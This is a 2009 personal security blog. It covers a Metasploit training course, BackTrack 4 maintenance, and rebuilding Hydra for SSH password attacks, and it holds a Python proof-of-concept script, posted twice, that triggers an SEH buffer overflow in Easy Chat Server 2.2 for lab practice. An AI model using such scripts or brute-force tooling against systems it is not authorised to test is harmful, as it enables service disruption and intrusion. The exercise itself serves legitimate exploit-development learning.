2009
09.26

Little updates…

Some new, and not so new things to mention.

Firstly, Offensive Security’s Metasploit Unleashed.
The course material, available free of charge
here, is finally out. Sometime next month the exam and an additional course video will be made available for a small fee. It must be mentioned, the money raised by this course is donated to the “I Hack for Charity” created by Johnny Long. So by taking the course, you are not only learning to use a valuable penetration and assessment tool, you are giving to a good cause.

A little quicky on how to update Backtrack 4 ‘s kernel.

root@bt4# apt-get update
root@bt4# apt-get install -d linux-image
root@bt4# cd /var/cache/apt/archives/
root@bt4# dpkg -i –force all linux-image-2.6.30.5_2.6.30.5-10.00.Custom_i386.deb
root@bt4# apt-get dist-upgrade
I suggest a reboot here to see if all is good (should see 2 kernels available at the grub scree)
root@bt4# apt-get remove –purge 2.6.29*
root@bt4# reboot

Again with Backtrack 4: If you plan on using Hydra (or XHydra) against SSH, you might be in for a little surprise. The stock version of Hydra distributed on BT4 is not compiled with the necessary SSH libraries. You’ll need to recompile it. I found a nice how to on the Remote Exploit forum (full thread). Also, it’s the same for Medusa too, so redoing that is needed as well…

# Download the hydra source, untar it, etc.
# ./configure
# nano Makefile
Edit the following lines to look like this, POSTGRES appears to be screwing stuff up in my case.
XDEFINES= -DLIBOPENSSL -DLIBSSH
XLIBS= -lssl -lssh -lcrypto

#make
#make install

If this doesn’t work, do what I did… Download the library and read the error messages. It’s all clearly explained…

—-

A quick note, another Joomla exploit has been released not too long ago (no big surprise), but what makes me mention this is the timing in which it came out. Seeing that I work for an ISP and Web/Application hosting company, being aware of these things can sometimes come in handy.
Two days after this exploit being published, I was asked by one of our partners he needed a web space setup with Joomla. The boss told me to make it happen, knowing it was full of vulnerabilities he says
“…put the latest version please…”.
In response “Sure no problem, but just got to tell you that a remote exploit came out on that version 2 days ago”.
It hasn’t been installed.

Sometimes the power if knowledge and a little assurance in one’s speech and go along way.

2009
09.12

BoF Exersice

Something that I enjoy doing, and which helps understanding buffer overflows / exploit coding is practice.

Grabe a known vulnerable application, find a PoC (proof of concept) and start from there. Here’s a start for anyone trying. Had loads of fun with this one:
Easy Chat Server 2.2

-First find and download the application (trial version should do fine) try -this-
-Install the application (make sure it works)
-Get a debugger (I suggest Ollydbg)
-Copy paste this PoC, it’s python but you can rewrite it in a language you may be more familiar with. Remember to change the IP/Port settings to your own Easy Chat Server
[this is based on his0k4 's exploit on Exploit-DB]
==================================================
#!/usr/bin/python
#Bug :
#EFS Easy Chat Server Authentication Request
#Buffer Overflow Exploit (SEH)

import struct
import socket

buffer = ‘\x41′ * 600

head = “GET /chat.ghp?username=”+buffer+”&password=”+buffer+”&room=1 HTTP/1.1\r\n”
head += “Host: 192.168.1.200\r\n”

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((‘192.168.1.200′,8080))
s.send(head + “\r\n\r\n”)
s.close()
==================================================

Got this to work under Windows XP Pro SP3 English. Good practice…
Use the links I provided in a previous post and have fun.

Good luck

2009
09.12

BoF Exersice

Something that I enjoy doing, and which helps understanding buffer overflows / exploit coding is practice.

Grabe a known vulnerable application, find a PoC (proff of concept) and start from there. Here’s a start for anyone trying. Had loads of fun with this one:
Easy Chat Server 2.2

-First find and download the application (trial version should do fine) try -this-
-Install the application (make sure it works)
-Get a debugger (I suggest Ollydbg)
-Copy paste this PoC, it’s python but you can rewrite it in a language you may be more familiar with. Remember to change the IP/Port settings to your own Easy Chat Server
[this is based on his0k4 's exploit on milw0rm]
==================================================
#!/usr/bin/python
#Bug :
#EFS Easy Chat Server Authentication Request
#Buffer Overflow Exploit (SEH)

import struct
import socket

buffer = ‘\x41′ * 600

head = “GET /chat.ghp?username=”+buffer+”&password=”+buffer+”&room=1 HTTP/1.1\r\n”
head += “Host: 192.168.1.200\r\n”

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((‘192.168.1.200′,8080))
s.send(head + “\r\n\r\n”)
s.close()
==================================================

Got this to work under Windows XP Pro SP3 English. Good practice…
Use the links I provided in a previous post and have fun.

Good luck

2009
09.07

BoF explained

Well, it’s been a while since I’ve posted. Family and work are taking most of my time. Also started practicing with Exploit codes and Buffer Overflows. Taking an application with a known vulnerability, then starting with a working PoC writing an exploit from there.

I would love to take the time and write up my experiences in this matter, but seeing that there are hundreds of websites/posts on this subject, I’ll just post 2 of my favorites. Well written and very understandable.

Peter Van Eeckhoutte’s blog
i-Hacked.com ‘s article on SEH BoFs

Enjoy…